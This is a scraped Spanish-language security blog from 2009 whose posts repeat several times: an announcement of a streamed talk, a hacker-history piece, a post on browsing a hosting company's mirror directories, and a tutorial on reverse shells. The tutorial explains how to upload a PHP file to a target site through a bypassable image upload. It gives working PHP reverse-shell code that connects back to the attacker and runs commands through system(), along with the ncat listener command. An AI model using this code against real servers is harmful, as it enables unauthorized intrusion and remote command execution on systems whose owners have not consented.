Cita de Codebit.org:
El dia 27 de diciembre a las 4:00 pm Hora Ciudad de México (GMT -6) se realizara un evento via streaming encabezado por paginas como:
Primer evento:
www.codebit.org --> Wargame para aprender desde cero. encabezada por hdstryOwrld
Posteriores capitulos:
www.sinfocol.org --> Mundo de la seguridad informatica. encabezada por Hades (Esperamos puedan confirmar su asistencia)
www.n3ur0n4.org -->pagina de @135747
www.seguridadblanca.org --> Página de seguridad informática, encabezada por Dedalo.
El primer evento pautado sera: de Marketing web y tecnicas SEO (posicionamiento en la web)
La pagina donde se transmitira este primer evento será en:
http://www.ustream.tv/channel/seo-web-marketing
Fin de la cita...
Como ven esto será muy interesante se haran charlas de seguridad informática, SEO, Informática en general, trucos y muchas cosas mas... si desean apuntarse entonces deben de ir a codebit.org y listo deben de buscar el tema o crear uno diciendoselo a hdstryowrld...
Espero se apunten...
Saludos
Dr.White
Backup Oficial de SeguridadBlanca.Org
viernes, 18 de diciembre de 2009
Streaming de Informática...
Cita de Codebit.org:
El dia 27 de diciembre a las 4:00 pm Hora Ciudad de México (GMT -6) se realizara un evento via streaming encabezado por paginas como:
Primer evento:
www.codebit.org --> Wargame para aprender desde cero. encabezada por hdstryOwrld
Posteriores capitulos:
www.sinfocol.org --> Mundo de la seguridad informatica. encabezada por Hades (Esperamos puedan confirmar su asistencia)
www.n3ur0n4.org -->pagina de @135747
www.seguridadblanca.org --> Página de seguridad informática, encabezada por Dedalo.
El primer evento pautado sera: de Marketing web y tecnicas SEO (posicionamiento en la web)
La pagina donde se transmitira este primer evento será en:
http://www.ustream.tv/channel/seo-web-marketing
Fin de la cita...
Como ven esto será muy interesante se haran charlas de seguridad informática, SEO, Informática en general, trucos y muchas cosas mas... si desean apuntarse entonces deben de ir a codebit.org y listo deben de buscar el tema o crear uno diciendoselo a hdstryowrld...
Espero se apunten...
Saludos
Dr.White
El dia 27 de diciembre a las 4:00 pm Hora Ciudad de México (GMT -6) se realizara un evento via streaming encabezado por paginas como:
Primer evento:
www.codebit.org --> Wargame para aprender desde cero. encabezada por hdstryOwrld
Posteriores capitulos:
www.sinfocol.org --> Mundo de la seguridad informatica. encabezada por Hades (Esperamos puedan confirmar su asistencia)
www.n3ur0n4.org -->pagina de @135747
www.seguridadblanca.org --> Página de seguridad informática, encabezada por Dedalo.
El primer evento pautado sera: de Marketing web y tecnicas SEO (posicionamiento en la web)
La pagina donde se transmitira este primer evento será en:
http://www.ustream.tv/channel/seo-web-marketing
Fin de la cita...
Como ven esto será muy interesante se haran charlas de seguridad informática, SEO, Informática en general, trucos y muchas cosas mas... si desean apuntarse entonces deben de ir a codebit.org y listo deben de buscar el tema o crear uno diciendoselo a hdstryowrld...
Espero se apunten...
Saludos
Dr.White
Etiquetas:
Eventos de Interes...,
seguridadblanca
jueves, 17 de diciembre de 2009
PenTest Reverse Shell con PHP y NETCAT
La mayoría de los que andan en el hacking, la seguridad informatica y/o la rama de la informática seguramente alguna ves ha escuchado del NMAP, el nmap viene en un paquete con otra herramienta, excelente herramienta para conexiones remotas, se llama NetCat, el netcat nos ayuda en muchas cosillas, entre ellas está el ver headers, hacer conexiones remotas, poner en escucha servidores y sinceramente es una t00l que se necesita en el pen-test...
Bueno ahora lo que yo les voy a enseñar es como manejar a traves del netcat manejar el code y al mismo tiempo no usar shells como la R57 o C99 mmm bueno aquí les cuento como haremos...
lo primero que debemos hacer es ganar acceso al host, es decir debemos hacer la intrusión... mm nos bastará con encontrar un upload de imagenes bypasseable o lo que ustedes quieran o encuentren entonces vamos a subir a http://www.h4x0r.com/ a atraves de un upload de imagenes un archivo .php
http://www.h4x0r.com/upload.php?user=dedalo
despues de que hemos subido entonces nos dará que la ruta de nuestro archivo .php es:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
Como se han dado cuenta ya sabemos la ruta de nuestro archivo.php creo que hasta aquí hay dos preguntas que seguro alguno de ustedes se hará... la primera es como encontrar el archivo... pues es menos compleja de lo que se imaginan la respuesta... la ruta del archivo la sabremos gracias a que muchas veces nos dicen donde esta alojado el archivo por medio de links o pistas que podemos seguir o en otros casos podemos usar nuestro Addon Live Http Headers para ver por donde fue...
La otra pregunta se las puedo responder también, creo que es... la mas importante, que hay dentro del archivo .php... pues bueno dentro del archivo PHP debe haber un código como este:
que pueden encontrar en pastebin también dando click aquí
como ven ese código es muy importante ya que es el que nos permitirá hacer la conexión a traves del puerto 6666, elejí ese por un random no es que siempre lo tienen que usar ustedes pueden escojer... ahora ya tenemos el archivo en el host... a hacer la conexión...no... aun falta algo que es fundamental... el PHP es un lenguaje que debe interpreta el Servidor como lo puede ser el APACHE que es el que normalmente se usa, en este caso como el servidor debe interpretarlo debemos acceder a el por eso debemos tener la ruta al archivo...previo a hacer la conexion debemos acceder a nuestro archivo que en este caso sería llendo a...
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
cuando nosotros ingresemso el servidor lo interpretará y automaticamente si el servidor tiene fallos de seguridad interesantes no habrá problema en hacer algo como esto...
Ahora si la parte del NETCAT... es la forma con la que haremos la conexión... el programa está diseñado para que podamos acceder a ejecutar comandos del servidor segun el usuario que normalmente es APACHE pero podemos escalar privilegios segun las actualizaciones y un millon de factores pero por ahora haremos algo simple...
Descarguen el NETCAT Dando click aquí o si tienen el NMAP completo deberian tener por ahí un archivo llamado NC...
ahora abrimos nuestra consola vamos hasta la carpeta del netcat y vamos a hacer conexion...
como la conexion es inversa osea Reverse Conection o Reverse Shell cuando accedamos a la web recien haremos conexión como dije de manera previa...
con el nc nos pondremos en escucha con la siguiente sintaxis...
ncat -v -l -p 6666
ahora si ya tenemos en escucha y ahora si den click en go su navegador con la url:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
ahora deben ver como su consola le dice que se han conectado a ustedes... ya podemos hacer cosas como wget y alguna que otra... esto no solo les sirve para hacer cosas malas sino en caso de soporte y otro tipo de cosas... es un poco riesgoso hacer este tipo de cosas tanto para ustedes como para la web asi que no lo recomiento...
espero haya estado claro el tutorial...
Dudas?
Saludos
Dr.White
Bueno ahora lo que yo les voy a enseñar es como manejar a traves del netcat manejar el code y al mismo tiempo no usar shells como la R57 o C99 mmm bueno aquí les cuento como haremos...
lo primero que debemos hacer es ganar acceso al host, es decir debemos hacer la intrusión... mm nos bastará con encontrar un upload de imagenes bypasseable o lo que ustedes quieran o encuentren entonces vamos a subir a http://www.h4x0r.com/ a atraves de un upload de imagenes un archivo .php
http://www.h4x0r.com/upload.php?user=dedalo
despues de que hemos subido entonces nos dará que la ruta de nuestro archivo .php es:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
Como se han dado cuenta ya sabemos la ruta de nuestro archivo.php creo que hasta aquí hay dos preguntas que seguro alguno de ustedes se hará... la primera es como encontrar el archivo... pues es menos compleja de lo que se imaginan la respuesta... la ruta del archivo la sabremos gracias a que muchas veces nos dicen donde esta alojado el archivo por medio de links o pistas que podemos seguir o en otros casos podemos usar nuestro Addon Live Http Headers para ver por donde fue...
La otra pregunta se las puedo responder también, creo que es... la mas importante, que hay dentro del archivo .php... pues bueno dentro del archivo PHP debe haber un código como este:
<?php
/*para esto podemos usar fputs o fwrite*/
set_time_limit(0);
$msgin = "SeguridadBlanca Remote Shell";
$sock = fsockopen("IP", 6666);
fputs($sock, $msgin);
while(1){
$back = fgets($sock, 6666);
if($back){
$sys = system($back);
fputs($sock, "$sys\n\n");
}
}
// By Dedalo From SeguridadBlanca
?>
que pueden encontrar en pastebin también dando click aquí
como ven ese código es muy importante ya que es el que nos permitirá hacer la conexión a traves del puerto 6666, elejí ese por un random no es que siempre lo tienen que usar ustedes pueden escojer... ahora ya tenemos el archivo en el host... a hacer la conexión...no... aun falta algo que es fundamental... el PHP es un lenguaje que debe interpreta el Servidor como lo puede ser el APACHE que es el que normalmente se usa, en este caso como el servidor debe interpretarlo debemos acceder a el por eso debemos tener la ruta al archivo...previo a hacer la conexion debemos acceder a nuestro archivo que en este caso sería llendo a...
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
cuando nosotros ingresemso el servidor lo interpretará y automaticamente si el servidor tiene fallos de seguridad interesantes no habrá problema en hacer algo como esto...
Ahora si la parte del NETCAT... es la forma con la que haremos la conexión... el programa está diseñado para que podamos acceder a ejecutar comandos del servidor segun el usuario que normalmente es APACHE pero podemos escalar privilegios segun las actualizaciones y un millon de factores pero por ahora haremos algo simple...
Descarguen el NETCAT Dando click aquí o si tienen el NMAP completo deberian tener por ahí un archivo llamado NC...
ahora abrimos nuestra consola vamos hasta la carpeta del netcat y vamos a hacer conexion...
como la conexion es inversa osea Reverse Conection o Reverse Shell cuando accedamos a la web recien haremos conexión como dije de manera previa...
con el nc nos pondremos en escucha con la siguiente sintaxis...
ncat -v -l -p 6666
ahora si ya tenemos en escucha y ahora si den click en go su navegador con la url:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
ahora deben ver como su consola le dice que se han conectado a ustedes... ya podemos hacer cosas como wget y alguna que otra... esto no solo les sirve para hacer cosas malas sino en caso de soporte y otro tipo de cosas... es un poco riesgoso hacer este tipo de cosas tanto para ustedes como para la web asi que no lo recomiento...
espero haya estado claro el tutorial...
Dudas?
Saludos
Dr.White
PenTest Reverse Shell con PHP y NETCAT
La mayoría de los que andan en el hacking, la seguridad informatica y/o la rama de la informática seguramente alguna ves ha escuchado del NMAP, el nmap viene en un paquete con otra herramienta, excelente herramienta para conexiones remotas, se llama NetCat, el netcat nos ayuda en muchas cosillas, entre ellas está el ver headers, hacer conexiones remotas, poner en escucha servidores y sinceramente es una t00l que se necesita en el pen-test...
Bueno ahora lo que yo les voy a enseñar es como manejar a traves del netcat manejar el code y al mismo tiempo no usar shells como la R57 o C99 mmm bueno aquí les cuento como haremos...
lo primero que debemos hacer es ganar acceso al host, es decir debemos hacer la intrusión... mm nos bastará con encontrar un upload de imagenes bypasseable o lo que ustedes quieran o encuentren entonces vamos a subir a http://www.h4x0r.com/ a atraves de un upload de imagenes un archivo .php
http://www.h4x0r.com/upload.php?user=dedalo
despues de que hemos subido entonces nos dará que la ruta de nuestro archivo .php es:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
Como se han dado cuenta ya sabemos la ruta de nuestro archivo.php creo que hasta aquí hay dos preguntas que seguro alguno de ustedes se hará... la primera es como encontrar el archivo... pues es menos compleja de lo que se imaginan la respuesta... la ruta del archivo la sabremos gracias a que muchas veces nos dicen donde esta alojado el archivo por medio de links o pistas que podemos seguir o en otros casos podemos usar nuestro Addon Live Http Headers para ver por donde fue...
La otra pregunta se las puedo responder también, creo que es... la mas importante, que hay dentro del archivo .php... pues bueno dentro del archivo PHP debe haber un código como este:
que pueden encontrar en pastebin también dando click aquí
como ven ese código es muy importante ya que es el que nos permitirá hacer la conexión a traves del puerto 6666, elejí ese por un random no es que siempre lo tienen que usar ustedes pueden escojer... ahora ya tenemos el archivo en el host... a hacer la conexión...no... aun falta algo que es fundamental... el PHP es un lenguaje que debe interpreta el Servidor como lo puede ser el APACHE que es el que normalmente se usa, en este caso como el servidor debe interpretarlo debemos acceder a el por eso debemos tener la ruta al archivo...previo a hacer la conexion debemos acceder a nuestro archivo que en este caso sería llendo a...
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
cuando nosotros ingresemso el servidor lo interpretará y automaticamente si el servidor tiene fallos de seguridad interesantes no habrá problema en hacer algo como esto...
Ahora si la parte del NETCAT... es la forma con la que haremos la conexión... el programa está diseñado para que podamos acceder a ejecutar comandos del servidor segun el usuario que normalmente es APACHE pero podemos escalar privilegios segun las actualizaciones y un millon de factores pero por ahora haremos algo simple...
Descarguen el NETCAT Dando click aquí o si tienen el NMAP completo deberian tener por ahí un archivo llamado NC...
ahora abrimos nuestra consola vamos hasta la carpeta del netcat y vamos a hacer conexion...
como la conexion es inversa osea Reverse Conection o Reverse Shell cuando accedamos a la web recien haremos conexión como dije de manera previa...
con el nc nos pondremos en escucha con la siguiente sintaxis...
ncat -v -l -p 6666
ahora si ya tenemos en escucha y ahora si den click en go su navegador con la url:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
ahora deben ver como su consola le dice que se han conectado a ustedes... ya podemos hacer cosas como wget y alguna que otra... esto no solo les sirve para hacer cosas malas sino en caso de soporte y otro tipo de cosas... es un poco riesgoso hacer este tipo de cosas tanto para ustedes como para la web asi que no lo recomiento...
espero haya estado claro el tutorial...
Dudas?
Saludos
Dr.White
Bueno ahora lo que yo les voy a enseñar es como manejar a traves del netcat manejar el code y al mismo tiempo no usar shells como la R57 o C99 mmm bueno aquí les cuento como haremos...
lo primero que debemos hacer es ganar acceso al host, es decir debemos hacer la intrusión... mm nos bastará con encontrar un upload de imagenes bypasseable o lo que ustedes quieran o encuentren entonces vamos a subir a http://www.h4x0r.com/ a atraves de un upload de imagenes un archivo .php
http://www.h4x0r.com/upload.php?user=dedalo
despues de que hemos subido entonces nos dará que la ruta de nuestro archivo .php es:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
Como se han dado cuenta ya sabemos la ruta de nuestro archivo.php creo que hasta aquí hay dos preguntas que seguro alguno de ustedes se hará... la primera es como encontrar el archivo... pues es menos compleja de lo que se imaginan la respuesta... la ruta del archivo la sabremos gracias a que muchas veces nos dicen donde esta alojado el archivo por medio de links o pistas que podemos seguir o en otros casos podemos usar nuestro Addon Live Http Headers para ver por donde fue...
La otra pregunta se las puedo responder también, creo que es... la mas importante, que hay dentro del archivo .php... pues bueno dentro del archivo PHP debe haber un código como este:
<?php
/*para esto podemos usar fputs o fwrite*/
set_time_limit(0);
$msgin = "SeguridadBlanca Remote Shell";
$sock = fsockopen("IP", 6666);
fputs($sock, $msgin);
while(1){
$back = fgets($sock, 6666);
if($back){
$sys = system($back);
fputs($sock, "$sys\n\n");
}
}
// By Dedalo From SeguridadBlanca
?>
que pueden encontrar en pastebin también dando click aquí
como ven ese código es muy importante ya que es el que nos permitirá hacer la conexión a traves del puerto 6666, elejí ese por un random no es que siempre lo tienen que usar ustedes pueden escojer... ahora ya tenemos el archivo en el host... a hacer la conexión...no... aun falta algo que es fundamental... el PHP es un lenguaje que debe interpreta el Servidor como lo puede ser el APACHE que es el que normalmente se usa, en este caso como el servidor debe interpretarlo debemos acceder a el por eso debemos tener la ruta al archivo...previo a hacer la conexion debemos acceder a nuestro archivo que en este caso sería llendo a...
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
cuando nosotros ingresemso el servidor lo interpretará y automaticamente si el servidor tiene fallos de seguridad interesantes no habrá problema en hacer algo como esto...
Ahora si la parte del NETCAT... es la forma con la que haremos la conexión... el programa está diseñado para que podamos acceder a ejecutar comandos del servidor segun el usuario que normalmente es APACHE pero podemos escalar privilegios segun las actualizaciones y un millon de factores pero por ahora haremos algo simple...
Descarguen el NETCAT Dando click aquí o si tienen el NMAP completo deberian tener por ahí un archivo llamado NC...
ahora abrimos nuestra consola vamos hasta la carpeta del netcat y vamos a hacer conexion...
como la conexion es inversa osea Reverse Conection o Reverse Shell cuando accedamos a la web recien haremos conexión como dije de manera previa...
con el nc nos pondremos en escucha con la siguiente sintaxis...
ncat -v -l -p 6666
ahora si ya tenemos en escucha y ahora si den click en go su navegador con la url:
http://www.h4x0r.com/upload/data/users/dedalo/shell.php
ahora deben ver como su consola le dice que se han conectado a ustedes... ya podemos hacer cosas como wget y alguna que otra... esto no solo les sirve para hacer cosas malas sino en caso de soporte y otro tipo de cosas... es un poco riesgoso hacer este tipo de cosas tanto para ustedes como para la web asi que no lo recomiento...
espero haya estado claro el tutorial...
Dudas?
Saludos
Dr.White
Etiquetas:
pen-test,
Seguridad Informática,
Tool
miércoles, 16 de diciembre de 2009
LEASEWEB
Hoy mientras estaba tratando de hacer un buen trabajo como alumno y como conocedor de seguridad pues quería actualizar el mozilla firefox di con un extenso como se dice... repertorio de muchas cosas entre ellas Firefox... muchos ya seguro sabian de esto pero yo recien me doy cuenta de esto... LEASEWEB es una web con servicio de hosting, VPS y mucho mas entonces cuando el PROXY del colegio administrado por HENRY (Excelente Administrador) me bloqueo la descarga di con que realmente no descargabamos del Host de mozilla...
Nosotros Descargamos de LEASEWEB es decir de un subdominio de LEASWEB conocido como mirror.leaseweb.com lo curioso de esto es que yo deduzco no ha de ser normal poder viajar por los directorios ya que esto se puede considerar como fallas pues encontre mirrors de muchisimas cosas entre ellas lo de firefox...
Click Aquí para ver los mirrors, se encuentran muchas cosas en estos mirrors pero yo directamente estaba aquí que si prestamos atención entonces podemos ver que se ven muchas versiones de FIREFOX, pero como les dije anteriormente se pueden viajar por los directorios hasta llegar al anteior link de los mirrors donde podemos encontrar files de nuestro queridisimo backtrack que pueden ver dando click aquí
Cosas como Releases de UBUNTU y mucho mas... de los mas interesante fue que hasta archivos un poco tránsfugos de windows encontré, puedes verlos dando click aquí bueno ustedes pueden ver por ahí lo que quieran y esto pues les puede servir para que cuando necesiten un ISO o algo de una distro la puedan hayar con facilidad en este repertorio...
Se que no es el GRAN DESCUBRIMIENTO pero esto les puede ayudar a encontrar siertos Archivos utiles para ustedes, versiones antiguas que no se encontraban con facilidad que se pueden usar para practicar y mucho mas...
Espero les sirva este Repertorio...
Saludos
Dr.White
Nosotros Descargamos de LEASEWEB es decir de un subdominio de LEASWEB conocido como mirror.leaseweb.com lo curioso de esto es que yo deduzco no ha de ser normal poder viajar por los directorios ya que esto se puede considerar como fallas pues encontre mirrors de muchisimas cosas entre ellas lo de firefox...
Click Aquí para ver los mirrors, se encuentran muchas cosas en estos mirrors pero yo directamente estaba aquí que si prestamos atención entonces podemos ver que se ven muchas versiones de FIREFOX, pero como les dije anteriormente se pueden viajar por los directorios hasta llegar al anteior link de los mirrors donde podemos encontrar files de nuestro queridisimo backtrack que pueden ver dando click aquí
Cosas como Releases de UBUNTU y mucho mas... de los mas interesante fue que hasta archivos un poco tránsfugos de windows encontré, puedes verlos dando click aquí bueno ustedes pueden ver por ahí lo que quieran y esto pues les puede servir para que cuando necesiten un ISO o algo de una distro la puedan hayar con facilidad en este repertorio...
Se que no es el GRAN DESCUBRIMIENTO pero esto les puede ayudar a encontrar siertos Archivos utiles para ustedes, versiones antiguas que no se encontraban con facilidad que se pueden usar para practicar y mucho mas...
Espero les sirva este Repertorio...
Saludos
Dr.White
LEASEWEB
Hoy mientras estaba tratando de hacer un buen trabajo como alumno y como conocedor de seguridad pues quería actualizar el mozilla firefox di con un extenso como se dice... repertorio de muchas cosas entre ellas Firefox... muchos ya seguro sabian de esto pero yo recien me doy cuenta de esto... LEASEWEB es una web con servicio de hosting, VPS y mucho mas entonces cuando el PROXY del colegio administrado por HENRY (Excelente Administrador) me bloqueo la descarga di con que realmente no descargabamos del Host de mozilla...
Nosotros Descargamos de LEASEWEB es decir de un subdominio de LEASWEB conocido como mirror.leaseweb.com lo curioso de esto es que yo deduzco no ha de ser normal poder viajar por los directorios ya que esto se puede considerar como fallas pues encontre mirrors de muchisimas cosas entre ellas lo de firefox...
Click Aquí para ver los mirrors, se encuentran muchas cosas en estos mirrors pero yo directamente estaba aquí que si prestamos atención entonces podemos ver que se ven muchas versiones de FIREFOX, pero como les dije anteriormente se pueden viajar por los directorios hasta llegar al anteior link de los mirrors donde podemos encontrar files de nuestro queridisimo backtrack que pueden ver dando click aquí
Cosas como Releases de UBUNTU y mucho mas... de los mas interesante fue que hasta archivos un poco tránsfugos de windows encontré, puedes verlos dando click aquí bueno ustedes pueden ver por ahí lo que quieran y esto pues les puede servir para que cuando necesiten un ISO o algo de una distro la puedan hayar con facilidad en este repertorio...
Se que no es el GRAN DESCUBRIMIENTO pero esto les puede ayudar a encontrar siertos Archivos utiles para ustedes, versiones antiguas que no se encontraban con facilidad que se pueden usar para practicar y mucho mas...
Espero les sirva este Repertorio...
Saludos
Dr.White
Nosotros Descargamos de LEASEWEB es decir de un subdominio de LEASWEB conocido como mirror.leaseweb.com lo curioso de esto es que yo deduzco no ha de ser normal poder viajar por los directorios ya que esto se puede considerar como fallas pues encontre mirrors de muchisimas cosas entre ellas lo de firefox...
Click Aquí para ver los mirrors, se encuentran muchas cosas en estos mirrors pero yo directamente estaba aquí que si prestamos atención entonces podemos ver que se ven muchas versiones de FIREFOX, pero como les dije anteriormente se pueden viajar por los directorios hasta llegar al anteior link de los mirrors donde podemos encontrar files de nuestro queridisimo backtrack que pueden ver dando click aquí
Cosas como Releases de UBUNTU y mucho mas... de los mas interesante fue que hasta archivos un poco tránsfugos de windows encontré, puedes verlos dando click aquí bueno ustedes pueden ver por ahí lo que quieran y esto pues les puede servir para que cuando necesiten un ISO o algo de una distro la puedan hayar con facilidad en este repertorio...
Se que no es el GRAN DESCUBRIMIENTO pero esto les puede ayudar a encontrar siertos Archivos utiles para ustedes, versiones antiguas que no se encontraban con facilidad que se pueden usar para practicar y mucho mas...
Espero les sirva este Repertorio...
Saludos
Dr.White
lunes, 14 de diciembre de 2009
Nuestros Inicios Según Dr.White
John Drapper AkA Captain Crunch, un nombre que la mayoría de los que estan en el ámbito de seguridad ignoran pero es el padre del Hacking el "primero" en vulnerar un sistema... El fue el Creador de la Caja Azul o también conocida como BlueBox, Este aparato permitia Phreakear los sistemas telefonicos de manera que por medio de inyección de tonos se permitian hacer llamadas gratis y a cualquier lugar... el fue arrestado por esta actividad sin embargo salio de prisión a seguir en el mundo de la informática.
El apodo se le da por que previo a inventar el Exploit, La caja azul, los tonos se generaban con un pitito que venia en las cajas del dicho cereal...
Imagen de la caja azul:

Imagen del Captain Crunch:

Ahora el Segundo BlackHat que mas a tenido efecto en la historia del Hacking... Kevin Mitnick, Fue buscado durante años por el FBI, CIA y otros por haber entrado en Computadores de los Gobiernos de estados unidos, también famoso por saber hackear mentes... Ingeniería Social...

Ahora los White hats... mas famosos... entre ellos pes voy a ponerles los que se destacan en el Open-Source el Mas famoso y me modelo a Seguir ^^ Richard Stallman...
El fundador del proyecto Open Source...

Otro "HACKER" es Steve Wozniak, Co-Fundador de Apple pero antes, en sus inicios antes de entrar al mundo de los ordenadores creaba Cajas Azules como las antes mencionadas y las vendia, el Arte se lo Enseño John Drapper y pues luego de un tiempo comenzó apple con sus ordenadores y toda la historia de los piratas de silicon valley...
Una imagen de Steve Wozniak:

mas información sobre silicon valley:
Click Aquí
Hackers Según Wikipedia:
click Aquí
Saludos
Dr.white
El apodo se le da por que previo a inventar el Exploit, La caja azul, los tonos se generaban con un pitito que venia en las cajas del dicho cereal...
Imagen de la caja azul:
Imagen del Captain Crunch:
Ahora el Segundo BlackHat que mas a tenido efecto en la historia del Hacking... Kevin Mitnick, Fue buscado durante años por el FBI, CIA y otros por haber entrado en Computadores de los Gobiernos de estados unidos, también famoso por saber hackear mentes... Ingeniería Social...
Ahora los White hats... mas famosos... entre ellos pes voy a ponerles los que se destacan en el Open-Source el Mas famoso y me modelo a Seguir ^^ Richard Stallman...
El fundador del proyecto Open Source...
Otro "HACKER" es Steve Wozniak, Co-Fundador de Apple pero antes, en sus inicios antes de entrar al mundo de los ordenadores creaba Cajas Azules como las antes mencionadas y las vendia, el Arte se lo Enseño John Drapper y pues luego de un tiempo comenzó apple con sus ordenadores y toda la historia de los piratas de silicon valley...
Una imagen de Steve Wozniak:
mas información sobre silicon valley:
Click Aquí
Hackers Según Wikipedia:
click Aquí
Saludos
Dr.white
Etiquetas:
Hacking General,
Seguridad Informática,
seguridadblanca
Suscribirse a:
Entradas (Atom)